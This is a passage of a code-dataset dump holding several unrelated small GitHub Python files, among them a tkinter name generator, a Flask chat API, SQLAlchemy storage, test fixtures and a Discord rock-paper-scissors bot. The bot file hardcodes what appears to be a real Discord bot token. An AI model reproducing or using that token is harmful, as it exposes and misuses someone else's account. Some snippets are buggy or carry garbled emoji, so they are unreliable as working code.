yscrollcommand=set(), width=30)\n\t\tself.syl_name_list = tk.Listbox(self, yscrollcommand=set(), width=30)\n\t\tconsonant_box = tk.Text(self, wrap=\"word\", yscrollcommand=set(), width=30)\n\t\tvowel_box = tk.Text(self, wrap=\"word\", yscrollcommand=set(), width=30)\n\t\tgen_button = tk.Button(self, text=\"Generate Name\", command=self.generate_name)\n\n\t\t#Create the consonant box\n\t\tconsonant_box.insert(1.0, str(gen.CONSONANTS)[1:-1])\n\t\tconsonant_box.insert(2.0, str(gen.CONSONANTS_DIGRAPHS_INITIAL)[1:-1])\n\t\tconsonant_box.insert(3.0, str(gen.CONSONANTS_DIGRAPHS_FINAL)[1:-1])\n\t\tconsonant_box.grid(column=0, row=0)\n\n\t\t#Create the vowel list box\n\t\tvowel_box.insert(1.0, str(gen.VOWELS)[1:-1], str(gen.VOWEL_DIGRAPHS)[1:-1])\n\t\tvowel_box.grid(column=1, row=0)\n\n\t\t#Create the \"Generate Name\" button\n\t\tgen_button.grid(column=0, row=1, columnspan=2)\n\n\t\t#Create the name list box\n\t\tself.name_list.grid(column=0, row=2)\n\n\t\t#Create a name list box with syllable spacing\n\t\tself.syl_name_list.grid(column=1, row=2)\n\t\n\tdef generate_name(self):\n\t\tnames = []\n\t\tnames_spaced = []\n\t\t\n\t\tfor i in range(10):\n\t\t\t#name = gen.generate_name()\n\t\t\tname, name_spaced = gen.generate_name()\n\t\t\tprint(name)\n\t\t\t#print(type(name))\n\t\t\tprint(name_spaced)\n\t\t\t#print(type(name_spaced))\n\t\t\tnames.append(name)\n\t\t\tnames_spaced.append(name_spaced)\n\t\t\n\t\tself.name_list.delete(0, \"end\")\n\t\tself.syl_name_list.delete(0, \"end\")\n\n\t\tfor name in names:\n\t\t\tself.name_list.insert(0, name)\n\n\t\tfor name_spaced in names_spaced:\n\t\t\tself.syl_name_list.insert(0, name_spaced)\n\ndef setup():\n\troot = tk.Tk()\n\n\tapp = App(root)\n\n\tapp.master.title(\"Random Name Generator\")\n\tapp.master.maxsize(1280, 
720)\n\n\troot.mainloop()\n\n\nsetup()\n","repo_name":"IAmNotIsaac/random-name-generator","sub_path":"src/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":1914,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"37912585041","text":"class Reviewdocs(object):\n \"\"\"docstring for Reviewdocs\"\"\"\n def __init__(self, arg=0):\n self.arg = arg\n\n def post_get_reviews():\n return {\n \"get\" : {\n \"tags\" : [ \"review\" ],\n \"summary\" : \"Get business reviews\",\n \"description\" : \"This can only be done by any user.\",\n \"operationId\" : \"getBusinessReviews\",\n \"produces\" : [ \"application/json\" ],\n \"parameters\" : [ {\n \"name\" : \"businessId\",\n \"in\" : \"path\",\n \"description\" : \"ID of business that whose reviews are to be fetched\",\n \"required\" : True,\n \"type\" : \"integer\",\n \"minimum\" : 1,\n \"format\" : \"int64\"\n } ],\n \"responses\" : {\n \"200\" : {\n \"description\" : \"operation successful\",\n \"schema\" : {\n \"$ref\" : \"#/definitions/inline_response_200_3\"\n }\n }\n }\n },\n \"post\" : {\n \"tags\" : [ \"review\" ],\n \"summary\" : \"Post business review\",\n \"description\" : \"This can only be done by an authenticated user.\",\n \"operationId\" : \"postReview\",\n \"produces\" : [ \"application/json\" ],\n \"parameters\" : [ {\n \"name\" : \"businessId\",\n \"in\" : \"path\",\n \"description\" : \"ID of business being reviewed\",\n \"required\" : True,\n \"type\" : \"integer\",\n \"minimum\" : 1,\n \"format\" : \"int64\"\n }, {\n \"in\" : \"body\",\n \"name\" : \"body\",\n \"description\" : \"Updated business object\",\n \"required\" : True,\n \"schema\" : {\n \"$ref\" : \"#/definitions/Review\"\n }\n } ],\n \"responses\" : {\n \"200\" : {\n \"description\" : \"operation successful\",\n \"schema\" : {\n \"$ref\" : \"#/definitions/inline_response_200_4\"\n }\n }\n }\n }\n }\n ","repo_name":"dondrzzy/The-Business-Center","sub_path":"app/apidocs/reviews_docs.py","file_name":"reviews_docs.py","file_ext":"py","file_size_in_byte":2252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"19642304101","text":"from collections import OrderedDict\nimport codecs\n\n\ndef get_topk_query(keyword_log_file, topk_num):\n \"\"\"\n get topk query by download count\n :param keyword_log_file:\n :param topk_num:\n :return: topk query's reversing ordered dictionary\n \"\"\"\n query_dict = OrderedDict()\n with codecs.open(keyword_log_file, 'r') as rf:\n for line in rf.readlines():\n items = line.split('|')\n query = items[0]\n download_count = items[-1]\n query_dict[query] = int(download_count)\n\n return OrderedDict(list(sorted(query_dict.items(), key=lambda x: -x[1]))[:topk_num])\n\n\ndef get_topk_query_app_lick_log(app_click_log_file, wanted_keys, name_dict: OrderedDict, topk):\n \"\"\"\n get topk's doc from every query's app lick log\n :param wanted_keys: the queries to get DOC\n :param name_dict: the dictionary of APPID and DOC\n :param topk: limit to get the size of topk's doc\n :return: a ordered dictionary of ordered dictionary\n \"\"\"\n click_log_dict = {}\n with codecs.open(app_click_log_file, 'r') as rf:\n for line in rf.readlines():\n items = line.split('|')\n current_key = items[0]\n app_id = items[1]\n app_download_count = items[-1]\n if click_log_dict.__contains__(current_key):\n click_log_dict[current_key][app_id] = (name_dict[app_id], app_download_count)\n else:\n click_log_dict[current_key] = OrderedDict()\n if 
name_dict.__contains__(app_id):\n click_log_dict[current_key][app_id] = (name_dict[app_id], app_download_count)\n\n for key, doc_dict in click_log_dict.items():\n click_log_dict[key] = OrderedDict(list(sorted(doc_dict.items(), key=lambda x: -x[1][1])[:topk]))\n\n return click_log_dict\n\n\ndef load_resources(filename):\n \"\"\"\n load resource file like this:\n APPID|string\n :param filename:\n :return: a dictionary that key is APPID, value is string\n \"\"\"\n resource_dict = {}\n with codecs.open(filename, 'r') as rf:\n for line in rf.readlines():\n app_id = line.split('|')[0]\n value_str = line.split('|')[-1]\n resource_dict[app_id] = value_str\n\n return resource_dict\n\n\ndef count_word_frequency(word_list, topk):\n \"\"\"\n count the words' frequency in list\n :param word_list: a string list\n :param topk: limitation number of result size\n :return: a dictionary ofr words frequency\n \"\"\"\n wordfreq = OrderedDict()\n for w in word_list:\n wordfreq[w] = word_list.count(w)\n\n return OrderedDict(list(sorted(wordfreq.items(), key=lambda x: -x[1]))[:topk])\n\n\ndef get_tag_word_frequency(tag_dict, app_click_log_dict, topk):\n \"\"\"\n get tags' words frequency count\n :param tag_dict:\n :param app_click_log_dict:\n :return: tags' words frequency dictionary\n \"\"\"\n word_dict = OrderedDict()\n for query, click_log_dict in app_click_log_dict.items():\n tag_list = []\n for app_id in click_log_dict.keys():\n tag_list = tag_list + tag_dict[app_id].split(',')\n word_dict[query] = count_word_frequency(tag_list, topk)\n return word_dict\n\n\ndef save_topk_doc(data, output_file):\n \"\"\"\n query|[\"doc1\", \"doc2\", ...]\n :param data:\n :param output_file:\n :return:\n \"\"\"\n pass\n\n\ndef save_topk_tag(data, output_file):\n \"\"\"\n query|[tag_word1, tag_word2, ...]\n :param data:\n :param output_file:\n :return:\n \"\"\"\n\n pass\n\n\ndef save_topk_doc_query(data, output_file):\n \"\"\"\n doc|[query1, query2, ...]\n :param data:\n :param output_file:\n :return:\n \"\"\"\n pass\n\n\nif __name__ == '__main__':\n # limit doc size\n doc_topk = 100\n # get top 10000 query\n keyword_click_log_file = ''\n app_click_log_file = ''\n\n doc_file = ''\n first_tag_file = ''\n second_tag_file = ''\n third_tag_file = ''\n\n doc_dict = load_resources(doc_file)\n first_tag_dict = load_resources(first_tag_file)\n second_tag_dict = load_resources(second_tag_file)\n third_tag_dict = load_resources(third_tag_file)\n\n keyword_click_log_dict = get_topk_query(keyword_click_log_file)\n app_click_log_dict = get_topk_query_app_lick_log(app_click_log_file, keyword_click_log_dict.keys(), doc_dict,\n doc_topk)\n\n","repo_name":"zhetanger/query-doc-tag-statistics","sub_path":"query_doc_tag_statistics.py","file_name":"query_doc_tag_statistics.py","file_ext":"py","file_size_in_byte":4341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"1067184224","text":"#!/usr/bin/python3\n\nimport os\nfrom models.base_model import BaseModel, Base\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker, scoped_session\n\n\nclass DBStorage:\n __engine = None\n __session = None\n\n def __init__(self):\n user = os.getenv(\"HBNB_MYSQL_USER\")\n pwd = os.getenv(\"HBNB_MYSQL_PWD\")\n host = os.getenv(\"HBNB_MYSQL_HOST\", default=\"localhost\")\n db = os.getenv(\"HBNB_MYSQL_DB\")\n\n self.__engine = create_engine(\n \"mysql+mysqldb://{}:{}@{}/{}\".format(user, pwd, host, db),\n pool_pre_ping=True)\n\n if os.getenv(\"HBNB_ENV\") == \"test\":\n 
Base.metadata.drop_all(self.__engine)\n\n def all(self, cls=None):\n if cls is None:\n classes = [BaseModel, User, State, City, Amenity, Place, Review]\n else:\n classes = [cls]\n\n objs = {}\n for c in classes:\n query = self.__session.query(c)\n for obj in query:\n key = \"{}.{}\".format(type(obj).__name__, obj.id)\n objs[key] = obj\n return objs\n\n def new(self, obj):\n self.__session.add(obj)\n\n def save(self):\n self.__session.commit()\n\n def delete(self, obj=None):\n if obj:\n self.__session.delete(obj)\n\n def reload(self):\n Base.metadata.create_all(self.__engine)\n Session = scoped_session(sessionmaker(\n bind=self.__engine, expire_on_commit=False))\n self.__session = Session()\n\n\n def close(self):\n \"\"\"Closes the current session.\"\"\"\n self.__session.close()\n","repo_name":"OfentseLoeto/AirBnB_clone_v4","sub_path":"models/engine/db_storage.py","file_name":"db_storage.py","file_ext":"py","file_size_in_byte":1596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"37152861664","text":"largest = None\r\nsmallest = None\r\n\r\nwhile True:\r\n num = input('Enter a number, type \"done\" to exit: ')\r\n if num == \"done\":\r\n break\r\n try:\r\n float(num)\r\n for i in num:\r\n if largest is None:\r\n largest = i\r\n elif i > largest:\r\n largest = i\r\n\r\n for p in num:\r\n if smallest is None:\r\n smallest = p\r\n elif p < smallest:\r\n smallest = p\r\n except:\r\n print(\"Invalid input\")\r\n\r\nprint(\"Maximium is\", largest)\r\nprint(\"Minimium is\", smallest)\r\n","repo_name":"jrfradella/halp-","sub_path":"assignment#5.py","file_name":"assignment#5.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"71643511613","text":"from io import open\nfrom setuptools import setup\n\nversion = '0.1.0'\nlon_descr = 'the module downloads the archive with the assembled NEW program from the link, unzips the program and checks the checksum, If everything is OK, the NEW program overwrites the OLD program'\n\nsetup(\n name='file_update_lib',\n version = version,\n\n author='DarkRadish',\n author_email='gridasovalex19032003@gmail.com',\n\n description='file update library',\n long_description = lon_descr,\n\n packages=['file_update_lib']\n)\n","repo_name":"GridasovAlex/File_update_lib","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"7420302484","text":"import datetime\n\nfrom flask import request, jsonify\nfrom flask_login import current_user, login_required\n\nfrom app.conversations import conversations_api_blueprint, conversation_services\nfrom app.exceptions import BadRequest, Unauthorized, NotFound, Conflict\nfrom app.models import User, Conversation\n\n\n@conversations_api_blueprint.route('/all')\n@login_required\ndef get_all_conversations():\n \"\"\"\n Get all conversations for the current user.\n\n :return: A JSON response containing the serialized conversations.\n :rtype: flask.Response\n \"\"\"\n\n def last_update(conv: Conversation) -> datetime.datetime:\n \"\"\"\n Inner function to determine the time of the latest update that occurred in a conversation\n by taking the max of the creation time and time of last message; Used to sort conversations\n\n :param conv: Conversation to evaluate\n :type conv: Conversation\n :return: Time of the last update\n :rtype: 
datetime.datetime\n \"\"\"\n messages = list(conv.messages)\n if messages:\n return max(messages[-1].timestamp, conv.date_created)\n return conv.date_created\n\n convs = conversation_services.get_user_conversations(current_user.id)\n convs.sort(key=lambda conv: last_update(conv), reverse=True)\n return jsonify([conv.serialized for conv in convs])\n\n\n@conversations_api_blueprint.route('/<string:conversation_id>', methods=['GET', ])\n@login_required\ndef get_conversation(conversation_id: str):\n \"\"\"\n Get a specific conversation by its ID.\n\n :param conversation_id: The ID of the conversation.\n :type conversation_id: str\n :return: A JSON response containing the serialized conversation.\n :rtype: flask.Response\n :raises 404: If the conversation with the given ID is not found.\n :raises 401: If the current user is not a participant in the conversation.\n \"\"\"\n\n conversation = Conversation.get_by_id(conversation_id)\n if not conversation:\n raise NotFound(message='Conversation not found')\n\n if not conversation_services.check_user_in_conversation(current_user.id, conversation_id):\n raise Unauthorized(message='You are not in this conversation, and therefore cannot view its data')\n\n return jsonify(conversation.serialized)\n\n\n@conversations_api_blueprint.route('/history/<string:conversation_id>')\n@login_required\ndef get_conversation_history(conversation_id: str):\n \"\"\"\n Get the history of a specific conversation by its ID.\n\n :param conversation_id: The ID of the conversation.\n :type conversation_id: str\n :return: A JSON response containing the serialized messages of the conversation.\n :rtype: flask.Response\n :raises 404: If the conversation with the given ID is not found.\n :raises 401: If the current user is not a participant in the conversation.\n \"\"\"\n\n conversation = Conversation.get_by_id(conversation_id)\n if not conversation:\n raise NotFound(message='Conversation not found')\n\n if not conversation_services.check_user_in_conversation(current_user.id, conversation_id):\n raise Unauthorized(message='You are not in this conversation, and therefore cannot view its data')\n\n onlyGetMessageIds = request.args.get('onlyGetId', default='false').lower() == 'true'\n if onlyGetMessageIds:\n return jsonify([message.id for message in conversation.messages])\n return jsonify([message.serialized_min for message in conversation.messages])\n\n\n@conversations_api_blueprint.route('/new/private', methods=['POST', ])\n@login_required\ndef create_private_conversation():\n \"\"\"\n Create a private conversation between the current user and a target user.\n\n :return: A JSON response containing the serialized conversation.\n :rtype: flask.Response\n :raises 400: If the request does not specify the user to create a private conversation with,\n or the specified user is the current user\n :raises 409: If the current user attempts to create a conversation with themselves\n or if a conversation already exists between the users.\n \"\"\"\n target_id = request.json['target']\n if not target_id:\n raise BadRequest(message='Target user ID was not specified')\n\n if not User.get_by_id(target_id):\n raise BadRequest(message='User ID is invalid')\n\n if current_user.id == target_id:\n raise BadRequest(message='Target user ID cannot be current user ID')\n\n conversation = conversation_services.create_private_conversation(current_user.id, target_id)\n\n if not conversation:\n raise Conflict(message='A conversation already exists between the users')\n\n return 
jsonify(conversation.serialized)\n\n\n@conversations_api_blueprint.route('/new/group', methods=['POST', ])\n@login_required\ndef create_group_conversation():\n \"\"\"\n Create a group conversation with multiple users.\n\n :return: A JSON response containing the serialized conversation.\n :rtype: flask.Response\n :raises 400: If the group name or the group members were not specified\n or the provided list of group members contains invalid users\n \"\"\"\n\n group_name = request.json['name']\n if not group_name:\n raise BadRequest(message='Group name was not specified')\n\n user_ids = request.json['users']\n if not user_ids:\n raise BadRequest(message='User IDs were not specified')\n\n for user_id in user_ids:\n if not User.get_by_id(user_id):\n raise BadRequest(message='One of more of the provided user IDs was invalid')\n\n if current_user.id not in user_ids:\n user_ids.append(current_user.id)\n\n conversation = conversation_services.create_group_conversation(group_name, user_ids, current_user.id)\n return jsonify(conversation.serialized)\n","repo_name":"TheTrustyPwo/StudyHub","sub_path":"app/conversations/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":5756,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"78"} +{"seq_id":"9479352227","text":"import discord\nimport discord.reaction\nimport discord.embeds\nimport asyncio\nfrom discord.ext import commands\n\nclient = commands.Bot(command_prefix = '.') # Change the command prefix\n\n@client.event\nasync def on_ready():\n print('We have logged in as {0.user}'.format(client))\n\n\n@client.command()\nasync def rps(ctx):\n await ctx.channel.send('Rock Paper Scissors')\n\n\n\nrlist = []\nrlist.append(None)\nrlist.append(None)\n\n@client.event\nasync def on_message(message):\n if (message.content[0:4] == '.rps'):\n\n if on_message.gamestatus == True:\n await message.channel.send('Game in Progress')\n return\n if len(message.mentions) != 1:\n return \n\n if message.mentions[0].bot == True:\n return \n \n on_reaction_add.ulist.append(message.mentions[0])\n on_reaction_add.ulist.append(message.author)\n\n # on_reaction_add.ulist[0] = message.mentions[0]\n # on_reaction_add.ulist[1] = message.author\n\n embed = discord.Embed()\n embed.add_field(name = 'Rock, Paper, Scissors!\\n'+ on_reaction_add.ulist[0].name + ' vs. ' + on_reaction_add.ulist[1].name, value ='Enter on Go!')\n on_message.m = await message.channel.send(embed = embed)\n await on_message.m.add_reaction('✂')\n await on_message.m.add_reaction('📰')\n await on_message.m.add_reaction('â›°')\n \n await asyncio.sleep(0.5)\n\n for i in range(3):\n await asyncio.sleep(1)\n embed = discord.Embed()\n embed.add_field(name = 'Rock, Paper, Scissors!\\n'+ on_reaction_add.ulist[0].name + ' vs. ' + on_reaction_add.ulist[1].name, value = str(3 - i))\n\n await on_message.m.edit(embed = embed)\n \n await asyncio.sleep(1)\n embed = discord.Embed()\n embed.add_field(name = 'Rock, Paper, Scissors!\\n'+ on_reaction_add.ulist[0].name + ' vs. 
' + on_reaction_add.ulist[1].name, value = 'Go!')\n\n await on_message.m.edit(embed = embed)\n\n on_message.gamestatus = True\n await asyncio.sleep(5)\n\n if rlist[0] == None and rlist[1] == None and on_message.gamestatus == True:\n await message.channel.send('Neither players gave an input') \n rlist[0] = None\n rlist[1] = None\n on_reaction_add.ulist = []\n on_message.gamestatus = False\n on_reaction_add.check = False\n on_reaction_add.react = False\n on_reaction_add.timer = False\n\non_message.gamestatus = False\n\n\n\n@client.event\nasync def on_reaction_add(reaction, user):\n if on_message.m.id != reaction.message.id:\n return\n if on_message.gamestatus == False:\n return\n if user == client.user:\n return\n\n if on_reaction_add.ulist[0] == user:\n rlist[0] = reaction.emoji\n elif on_reaction_add.ulist[1] == user:\n rlist[1] = reaction.emoji\n \n #rlist.append(reaction.emoji)\n await asyncio.sleep(2)\n \n on_reaction_add.timer = True\n if (on_reaction_add.react == False):\n on_reaction_add.react = True\n \n if rlist[0] == None:\n await reaction.message.channel.send(on_reaction_add.ulist[0].name + ' did not input on time')\n elif rlist[1] == None:\n await reaction.message.channel.send(on_reaction_add.ulist[1].name + ' did not input on time')\n else:\n await reaction.message.channel.send(str(rlist[0]) + ' : ' + str(rlist[1]))\n on_reaction_add.check = True\n\n \n\n # Check for win condition\n if on_reaction_add.check:\n if rlist[0] == rlist[1]:\n await reaction.message.channel.send('Tie!')\n elif (str(rlist[0]) == '✂' and str(rlist[1]) == '📰'):\n await reaction.message.channel.send(on_reaction_add.ulist[0].name + ' has won!')\n elif (str(rlist[0]) == '📰' and str(rlist[1]) == 'â›°'):\n await reaction.message.channel.send(on_reaction_add.ulist[0].name + ' has won!')\n elif (str(rlist[0]) == 'â›°' and str(rlist[1]) == '✂'):\n await reaction.message.channel.send(on_reaction_add.ulist[0].name + ' has won!')\n \n elif (str(rlist[1]) == '✂' and str(rlist[0]) == '📰'):\n await reaction.message.channel.send(on_reaction_add.ulist[1].name + ' has won!')\n elif (str(rlist[1]) == '📰' and str(rlist[0]) == 'â›°'):\n await reaction.message.channel.send(on_reaction_add.ulist[1].name + ' has won!')\n elif (str(rlist[1]) == 'â›°' and str(rlist[0]) == '✂'):\n await reaction.message.channel.send(on_reaction_add.ulist[1].name + ' has won!')\n \n \n\n await asyncio.sleep(6)\n on_reaction_add.ulist = []\n rlist[0] = None\n rlist[1] = None\n on_message.gamestatus = False\n on_reaction_add.check = False\n on_reaction_add.react = False\n on_reaction_add.timer = False\n return\n # on_reaction_add.ulist[0] = None\n # on_reaction_add.ulist[1] = None\n\n\n \n\n \n\n# @client.event\n# async def on_reaction_add(reaction, user):\n# await reaction.message.channel.send('Duplicate')\non_reaction_add.ulist = []\n# on_reaction_add.ulist.append(None)\n# on_reaction_add.ulist.append(None)\non_reaction_add.check = False\non_reaction_add.react = False\non_reaction_add.timer = False\non_message.m = 0\n\nclient.run('NjQyOTE3ODI3MTM2OTc4OTY0.Xcd6cA.BCSLe7pTgjJcUoqT1gZ9p7H6YJc')","repo_name":"rynbhuiya/DiscordBotContest","sub_path":"rpsbot.py","file_name":"rpsbot.py","file_ext":"py","file_size_in_byte":5425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"36011847162","text":"class Solution:\n def convert(self, s: str, numRows: int) -> str:\n rowdict = {}\n \n if numRows == 1:\n return s\n \n for i in range(numRows):\n rowdict[i] = []\n \n count = 0\n directionDown = True\n 
for char in s:\n rowdict[count].append(char)\n if count == numRows - 1:\n directionDown = False\n if count == 0:\n directionDown = True\n if directionDown:\n count += 1\n else:\n count -= 1\n \n ans = \"\"\n for key, value in rowdict.items():\n ans += \"\".join(value)\n print(ans)\n return ans","repo_name":"MadhuranS/leetcode-practice","sub_path":"zigzag-conversion.py","file_name":"zigzag-conversion.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"16452994439","text":"from urllib.parse import urlparse, parse_qs\n\nimport requests\n\nBASE_URL = \"http://primo.nli.org.il/PrimoWebServices/xservice/search/full\"\n\n\ndef extract_doc_id(url):\n qs = urlparse(url).query\n d = parse_qs(qs)\n ids = d.get('doc') or d.get('docId')\n if not ids:\n raise KeyError(\"doc id not found in url: {}\".format(url))\n return ids[0]\n\n\ndef primo_request(doc_id):\n params = {\n \"institution\": \"NNL\",\n \"docId\": doc_id,\n \"json\": \"true\"\n }\n r = requests.get(BASE_URL, params)\n r.raise_for_status()\n d = r.json()\n doc = d['SEGMENTS']['JAGROOT']['RESULT']['DOCSET']['DOC']['PrimoNMBib'][\n 'record']\n return doc\n","repo_name":"buzush/MapApp","sub_path":"librarian/primo.py","file_name":"primo.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"768618569","text":"import os\n\nimport pytest\nfrom zm.utils import substBuiltInVars\nfrom zm import installdirvars\nfrom zm.autodict import AutoDict\nfrom zm.constants import PLATFORM, DEFAULT_BUILDWORKNAME\nfrom zm.features import TASK_TARGET_FEATURES\n\nfrom tests.func_utils import *\n\nFORINSTALL_PRJDIRS = [\n joinpath('cpp', '09-complex-unittest'),\n joinpath('subdirs', '2-complex'),\n]\n\ndef getInstallFixtureParams():\n\n fixtures = []\n dvarsCfgMap = installdirvars.CONFIG_MAP\n defaultVars = {\n name:dvarsCfgMap[name].default\n for name in ('prefix', 'bindir', 'libdir')\n }\n\n #### 1\n params = AutoDict(**defaultVars)\n params.installArgs = []\n\n fixtures.append(AutoDict(id = len(fixtures) + 1, **params))\n\n #### 2\n params = AutoDict(\n prefix = '/usr/my',\n bindir = defaultVars['bindir'],\n libdir = defaultVars['libdir']\n )\n params.installArgs = ['--prefix', params.prefix]\n\n fixtures.append(AutoDict(id = len(fixtures) + 1, **params))\n\n #### 3\n params = AutoDict(\n prefix = '/usr/my',\n bindir = '/bb',\n libdir = '/ll',\n )\n\n params.installArgs = [\n '--prefix', params.prefix,\n '--bindir', params.bindir,\n '--libdir', params.libdir\n ]\n\n fixtures.append(AutoDict(id = len(fixtures) + 1, **params))\n\n #### 4\n params = AutoDict(\n prefix = '/usr/my',\n bindir = 'bb-aa',\n libdir = 'll_dd',\n )\n\n params.installArgs = [\n '--prefix', params.prefix,\n '--bindir', params.bindir,\n '--libdir', params.libdir\n ]\n\n fixtures.append(AutoDict(id = len(fixtures) + 1, **params))\n\n #### 5\n params = AutoDict(\n prefix = 'usr2/my',\n bindir = defaultVars['bindir'],\n libdir = 'mylib',\n )\n\n params.installArgs = [\n '--prefix', params.prefix,\n '--libdir', params.libdir\n ]\n\n fixtures.append(AutoDict(id = len(fixtures) + 1, **params))\n\n ### store ids\n for item in fixtures:\n item['id'] = str(item['id'])\n\n pairs = []\n for i, _ in enumerate(fixtures):\n cur = fixtures[i]\n nex = fixtures[i+1] if i+1 < len(fixtures) else fixtures[0]\n pairs.append([cur, nex])\n\n return pairs\n\nINSTALL_FIXTURE_PARAMS = getInstallFixtureParams()\n\ndef 
checkBuildWorkDir(testSuit):\n \"\"\"\n Check that the @bld directory exists and isn't empty\n \"\"\"\n\n buildtypedir = testSuit.confManager.root.selectedBuildTypeDir\n buildworkdir = joinpath(buildtypedir, DEFAULT_BUILDWORKNAME)\n\n assert os.path.isdir(buildworkdir)\n assert len(os.listdir(buildworkdir)) > 0\n\n@pytest.mark.usefixtures(\"unsetEnviron\")\nclass TestInstall(object):\n\n @pytest.fixture(params = getZmExecutables())\n def allZmExe(self, request):\n self.zmExe = zmExes[request.param]\n\n @pytest.fixture(params = FORINSTALL_PRJDIRS)\n def project(self, request, tmpdir):\n\n def teardown():\n printErrorOnFailed(self, request)\n\n request.addfinalizer(teardown)\n setupTest(self, request, tmpdir)\n\n def _checkInstallResults(self, cmdLine, check):\n\n check = check.copy()\n assert isdir(check.destdir)\n\n isWindows = PLATFORM == 'windows'\n\n targets = set()\n processConfManagerWithCLI(self, cmdLine)\n\n checkBuildWorkDir(self)\n\n svars = self.confManager.root.builtInVars\n for name in ('prefix', 'bindir', 'libdir'):\n check[name] = substBuiltInVars(check[name], svars)\n if not os.path.isabs(check[name]):\n check[name] = '/' + check[name]\n check[name] = check[name].replace('/', os.sep)\n\n tasks = getBuildTasks(self.confManager)\n for taskName, taskParams in tasks.items():\n\n handleTaskFeatures(self, taskParams)\n features = taskParams['features']\n\n if 'test' in taskParams['features']:\n # ignore tests\n continue\n\n if not [ x for x in features if x in TASK_TARGET_FEATURES ]:\n # check only with features from TASK_TARGET_FEATURES\n continue\n\n taskEnv = getTaskEnv(self, taskName)\n fpattern, targetKind = getTargetPattern(taskEnv, features)\n\n if targetKind == 'stlib':\n # static libs aren't installed\n continue\n\n isExe = targetKind == 'exe'\n target = taskParams.get('target', taskName)\n\n if 'install-path' not in taskParams:\n targetdir = check.bindir if isExe else check.libdir\n else:\n installPath = taskParams.get('install-path', '')\n if not installPath:\n continue\n\n installPath = os.path.normpath(utils.substBuiltInVars(installPath, svars))\n targetdir = installPath\n\n if not os.path.isabs(targetdir):\n targetdir = joinpath(check.prefix, targetdir)\n\n if check.destdir:\n targetdir = joinpath(check.destdir,\n os.path.splitdrive(targetdir)[1].lstrip(os.sep))\n\n targetpath = joinpath(targetdir, fpattern % target)\n targets.add(targetpath)\n\n if targetKind == 'exe':\n assert os.access(targetpath, os.X_OK)\n\n if targetKind == 'shlib':\n verNum = taskParams.get('ver-num', None)\n if verNum:\n nums = verNum.split('.')\n if targetpath.endswith('.dylib'):\n fname = fpattern % (target + '.' + nums[0])\n targets.add(joinpath(targetdir, fname))\n fname = fpattern % (target + '.' + verNum)\n targets.add(joinpath(targetdir, fname))\n else:\n targets.add(targetpath + '.' + nums[0])\n targets.add(targetpath + '.' 
+ verNum)\n\n if taskEnv.DEST_BINFMT == 'pe':\n fname = fpattern % (target + '-' + nums[0])\n targets.add(joinpath(targetdir, fname))\n\n if isWindows:\n targetpath = joinpath(targetdir, '%s.lib' % target)\n assert isfile(targetpath)\n targets.add(targetpath)\n\n for root, _, files in os.walk(check.destdir):\n for name in files:\n path = joinpath(root, name)\n assert path in targets\n\n @pytest.fixture(params = INSTALL_FIXTURE_PARAMS, ids = lambda x: x[0]['id'])\n def installFixtures(self, request, tmpdir):\n\n testdir = str(tmpdir.realpath())\n fixturesList = request.param.copy()\n for fixtures in fixturesList:\n fixtures['destdir'] = joinpath(testdir, 'inst')\n\n return fixturesList\n\n def test(self, allZmExe, project, installFixtures):\n\n for fixtures in installFixtures:\n destdir = fixtures.destdir\n\n cmdLine = ['install', '--destdir', destdir]\n cmdLine.extend(fixtures.installArgs)\n exitcode, _, _ = runZm(self, cmdLine)\n assert exitcode == 0\n\n self._checkInstallResults(cmdLine, fixtures)\n\n cmdLine[0] = 'uninstall'\n exitcode, _, _ = runZm(self, cmdLine)\n assert exitcode == 0\n assert not os.path.exists(destdir)\n\n#############################################################################\n#############################################################################\n\nFORINSTALLFILES_PRJDIRS = [\n joinpath('mixed', '01-cshlib-cxxprogram'),\n]\n\n@pytest.mark.usefixtures(\"unsetEnviron\")\nclass TestInstallFiles(object):\n\n @pytest.fixture(params = getZmExecutables())\n def allZmExe(self, request):\n self.zmExe = zmExes[request.param]\n\n @pytest.fixture(params = FORINSTALLFILES_PRJDIRS)\n def project(self, request, tmpdir):\n\n def teardown():\n printErrorOnFailed(self, request)\n\n request.addfinalizer(teardown)\n setupTest(self, request, tmpdir)\n\n def _prepareFixtures(self, fixtures, testdir):\n\n fixtures['destdir'] = joinpath(testdir, 'inst')\n\n if self.testDirPath == FORINSTALLFILES_PRJDIRS[0]:\n\n dirprfx = '$(appdatadir)/scripts'\n\n files = [\n { 'path' : dirprfx + '/my-script.py', 'chmod' : 0o755, },\n { 'path' : dirprfx + '/test.py', 'chmod' : 0o755, },\n { 'path' : dirprfx + '/asd/test2.py', 'chmod' : 0o755, },\n #{ 'path' : dirprfx + '/my-script.link.py', 'chmod' : 0o755, },\n { 'path' : dirprfx + '2/my-script.py', 'chmod' : 0o755, },\n { 'path' : dirprfx + '2/test.py', 'chmod' : 0o755, },\n { 'path' : dirprfx + '3/my-script.py', 'chmod' : 0o644, },\n { 'path' : dirprfx + '3/test.py', 'chmod' : 0o644, },\n { 'path' : dirprfx + '3/test2.py', 'chmod' : 0o644, },\n { 'path' : dirprfx + '/mtest.py', 'chmod' : 0o750 },\n ]\n\n if PLATFORM == 'linux':\n files.extend([\n { 'path' : dirprfx + '/mtest-link.py', 'linkto' : dirprfx + '/mtest.py' },\n 